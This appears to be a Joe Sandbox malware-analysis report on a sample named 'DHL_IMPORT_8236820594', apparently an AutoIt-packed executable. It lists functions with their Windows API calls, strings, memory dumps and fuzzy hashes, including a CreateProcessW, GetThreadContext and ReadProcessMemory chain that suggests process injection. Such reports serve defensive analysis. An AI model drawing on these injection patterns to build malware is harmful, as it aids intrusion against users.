Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction ID: 5fa82bd7f9071c919a8e2c5e4dfc698e421e8af349da660123bebc303643f16b
Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction Fuzzy Hash: 0B62FC34E142189BEB24CBA4CC90BEEB376EF58300F1091A9D10DEB2D4E7759E81CB59

Function 004E2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00522C8C

Part of subcall function 004E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004E3A97,?,?,004E2E7F,?,?,?,00000000), ref: 004E3AC2

Part of subcall function 004E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004E2DC4

Strings

X, xrefs: 00522C5A
`eZ, xrefs: 00522C85

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`eZ
API String ID: 779396738-988981078
Opcode ID: 21849649131373f0949f963a7da3e1ccd04c5423a1eee2ae2084abbc591523a6
Instruction ID: efe20a39a9a963c5cc539e81f644ee5251e02523f3bc0540fce80517850cef4c
Opcode Fuzzy Hash: 21849649131373f0949f963a7da3e1ccd04c5423a1eee2ae2084abbc591523a6
Instruction Fuzzy Hash: 0421C370A00298AFCB41DF95D849BEE7BFCAF49305F00405AE405B7281DBB85A898FA5

Function 004FFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00500668

Part of subcall function 005032A4: RaiseException.KERNEL32(?,?,?,0050068A,?,005B1444,?,?,?,?,?,?,0050068A,004E1129,005A8738,004E1129), ref: 00503304

__CxxThrowException@8.LIBVCRUNTIME ref: 00500685

Strings

Unknown exception, xrefs: 00500692

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: c57051e6e2ab611716fe2e5c01daba7a63e8b62d8c6352ca5a445a18ffc65da0
Instruction ID: 7c71ce6be2f1368a8b4c21f2cf467799e65590767c33e050ddfeba8938821859
Opcode Fuzzy Hash: c57051e6e2ab611716fe2e5c01daba7a63e8b62d8c6352ca5a445a18ffc65da0
Instruction Fuzzy Hash: 3EF0683490020E77CF00B665DC4ADAE7F6D7F80350F604531B914965D1EF72DA69C985

Function 00567F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005682F5
TerminateProcess.KERNEL32(00000000), ref: 005682FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 005684DD

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: cd8b9ebf8e4ca9a9db53b1a414b368ef3687df905ceee02a464727d030f75ee8
Instruction ID: 8ceae6b4f467cfb867698bd1e24b284fc980fedc5971046a7ff59e3e584be586
Opcode Fuzzy Hash: cd8b9ebf8e4ca9a9db53b1a414b368ef3687df905ceee02a464727d030f75ee8
Instruction Fuzzy Hash: 04126C71A083419FC714DF28C484B2ABBE5BF89318F148A5DE8998B352DB35ED45CF92

Function 004E10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 004E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004E1BF4
Part of subcall function 004E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 004E1BFC
Part of subcall function 004E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004E1C07
Part of subcall function 004E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004E1C12
Part of subcall function 004E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 004E1C1A
Part of subcall function 004E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 004E1C22

Part of subcall function 004E1B4A: RegisterWindowMessageW.USER32(00000004,?,004E12C4), ref: 004E1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004E136A
OleInitialize.OLE32 ref: 004E1388
CloseHandle.KERNEL32(00000000,00000000), ref: 005224AB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: b3bd47c6422e63f881c75373c1ff898aaec2f8d5b783f10362dc7696a8031da8
Instruction ID: 09648015eed30c44d17d0b8dde8ad8d254dd3c3d9342ab0ec9356648827b35ee
Opcode Fuzzy Hash: b3bd47c6422e63f881c75373c1ff898aaec2f8d5b783f10362dc7696a8031da8
Instruction Fuzzy Hash: B271B4B4911A408EC7E4DF7AA8656953FE0FBA83443D4832ED40AC72A1EB347408EF5D

Function 005186AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,005185CC,?,005A8CC8,0000000C), ref: 00518704
GetLastError.KERNEL32(?,005185CC,?,005A8CC8,0000000C), ref: 0051870E
__dosmaperr.LIBCMT ref: 00518739

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 386075f843400f4d2797f16ff89911708c103d37074732cf4c0681d4cd83be0d
Instruction ID: 934d36758ad416a4f3c2945b86bf1e5d1a7b0c52e54cbef7788181e2ba2a452e
Opcode Fuzzy Hash: 386075f843400f4d2797f16ff89911708c103d37074732cf4c0681d4cd83be0d
Instruction Fuzzy Hash: A4018E3260422056F67067346849BFE2F49BBE1774F380E1EF8188B1D2EEB1CCC19150

Function 004F1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004F17F6

Strings

CALL, xrefs: 004F17C6

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 42065f800d1cce7038889e683979517121ee87c0c4c33741e918ac528e1763b3
Instruction ID: 96c4c0baec913c7b988e99fc3313f6902b6e04cebc66e01510315bca91024fad
Opcode Fuzzy Hash: 42065f800d1cce7038889e683979517121ee87c0c4c33741e918ac528e1763b3
Instruction Fuzzy Hash: 7A229C70608205EFC714DF15C484A3ABBF1BF85354F24892EF69A8B3A1D739E845CB96

Function 004E5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,004E949C,?,00008000), ref: 004E5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,004E949C,?,00008000), ref: 00524052

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 72df62f4bb7542ef94591c6f3c0fd308be5ccab66db9d93cedcca00d7a81eca2
Instruction ID: 21f3a1a01f025f5d979cb4488987f0ae5f4d987519c6124907e8591fd56561ba
Opcode Fuzzy Hash: 72df62f4bb7542ef94591c6f3c0fd308be5ccab66db9d93cedcca00d7a81eca2
Instruction Fuzzy Hash: 2C01B530145725B6E3304A2ADC0EF977F98EF027B5F108315BA9C5E1E0C7B45895DB94

Function 033E12E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 033E1AA3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 033E1B39
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 033E1B5B

Memory Dump Source

Source File: 00000000.00000002.1660044699.00000000033E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 033E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction ID: 6f21eb32767dc00833ca00a58028fde095cda4ae376120de11334e3176232b3b
Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction Fuzzy Hash: 0112CD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 004FFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 004FFD1F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 4fafa666665abb9ed7aa1286da0b88b11c4112babdf67d32f9f77bde9cc714ce
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: C9311374A0010DDBD718CF59D48096AFBA1FF49300B2482A6EA0ACB756D735EDC5CBC5

Function 004E4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,004E4EDD,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4E9C
Part of subcall function 004E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004E4EAE
Part of subcall function 004E4E90: FreeLibrary.KERNEL32(00000000,?,?,004E4EDD,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4EFD

Part of subcall function 004E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00523CDE,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4E62
Part of subcall function 004E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004E4E74
Part of subcall function 004E4E59: FreeLibrary.KERNEL32(00000000,?,?,00523CDE,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4E87

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 20446bf9687e86c36a5f52033d29f0543c8329643220ce0ad50fcd1cb6380ce7
Instruction ID: 39eb41a7c4cdb9f0a4ba4421a8437df6b8020ddb0cca5b617d73a798759261d0
Opcode Fuzzy Hash: 20446bf9687e86c36a5f52033d29f0543c8329643220ce0ad50fcd1cb6380ce7
Instruction Fuzzy Hash: F011E732600305AACB14BF66DC06FAD7BA5AF80B16F10842FF542B61D1DE789E459754

Function 00518402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00518440

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: bf2f48107d09e6bde6779802a12c8ff080414b84ae7c4564a7691c6784d3ead6
Instruction ID: 9c728c20bc6e6e95d20eb66c91f11c3b30e9f0a2ca2f15d79708d9c71d7e5d25
Opcode Fuzzy Hash: bf2f48107d09e6bde6779802a12c8ff080414b84ae7c4564a7691c6784d3ead6
Instruction Fuzzy Hash: 8311487190410AAFDF15DF58E9409EE7BF5FF49304F104059F808AB352DA30EA11CBA4

Function 00515000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00514C7D: RtlAllocateHeap.NTDLL(00000008,004E1129,00000000,?,00512E29,00000001,00000364,?,?,?,0050F2DE,00513863,005B1444,?,004FFDF5,?), ref: 00514CBE

_free.LIBCMT ref: 0051506C

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 8e036794bd09ce33c5568184e8d1dee8a195e0277a386b57101d98ae413d26ee
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: A0012B722047059BF3218E5598499DAFFE8FBC9370F65051DE18483280E6706845C6B4

Function 0050E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 1a52793eb4ac64815f2a23b14e06dd5eb63b97e86468b52c08c3220e97c69383
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: FBF0F432510A1596E7313A69BC0EB9F3F98BFE2335F200F15F425931D2CB7198428AA5

Function 004E9CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004E9CBD

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 98ad5ad2a30495acd569bab0290c22198dc8be697418d8b11e2c8fcba327d5f9
Instruction ID: 9c42df9eb02ea5abb05500632af788cf686b48fded982d5dd5540612edc1491f
Opcode Fuzzy Hash: 98ad5ad2a30495acd569bab0290c22198dc8be697418d8b11e2c8fcba327d5f9
Instruction Fuzzy Hash: 77F0F4B22006056ED7109F29C806A6BBB98EF44760F10852AFA1ACB2D1DB35E4148AA4

Function 00514C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,004E1129,00000000,?,00512E29,00000001,00000364,?,?,?,0050F2DE,00513863,005B1444,?,004FFDF5,?), ref: 00514CBE

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5ae0663d51d07d6637544b67e8d2982837dcc7da6282ae966a87cfc9243a71ee
Instruction ID: 168afc22aa3d593fa7e55498124efd83c4b6bf34807a53b9a1e579efaed24639
Opcode Fuzzy Hash: 5ae0663d51d07d6637544b67e8d2982837dcc7da6282ae966a87cfc9243a71ee
Instruction Fuzzy Hash: 78F0E93160262567FB215F769C09BDE3F88BF917A8B145525BC19A62C1CA30DC809EE0

Function 00513820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,005B1444,?,004FFDF5,?,?,004EA976,00000010,005B1440,004E13FC,?,004E13C6,?,004E1129), ref: 00513852

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 58abc3e864d213f786f9b2e7100d2bb539437f9e95c1bdbf026159b7b9b9bc99
Instruction ID: 05996eb6d273e5358a0dc32ce982b4838005fe11766d9667d07110a9085a58c0
Opcode Fuzzy Hash: 58abc3e864d213f786f9b2e7100d2bb539437f9e95c1bdbf026159b7b9b9bc99
Instruction Fuzzy Hash: AEE0E531102626B6F73127769C38BDA3F48BB827B0F050130BD08929C0DB10ED8196E1

Function 004E4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4F6D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 86fbb64625bba7085be227a30d00f3bf36075b8542ff0c8265f192fb38b2ca57
Instruction ID: ab5a2242de86ad1606227c83ae5aa34bdf2a9f67d53c61bf8ab3fe7c5b402c76
Opcode Fuzzy Hash: 86fbb64625bba7085be227a30d00f3bf36075b8542ff0c8265f192fb38b2ca57
Instruction Fuzzy Hash: C8F08C70405382CFCB348F22E494812BBE0AF5471A320897EE1DA82610C7399C44DB08

Function 0054CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0052EE51,005A3630,00000002), ref: 0054CD26

Part of subcall function 0054CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0054CD19,?,?,?), ref: 0054CC59
Part of subcall function 0054CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0054CD19,?,?,?,?,0052EE51,005A3630,00000002), ref: 0054CC6E
Part of subcall function 0054CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0054CD19,?,?,?,?,0052EE51,005A3630,00000002), ref: 0054CC7A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

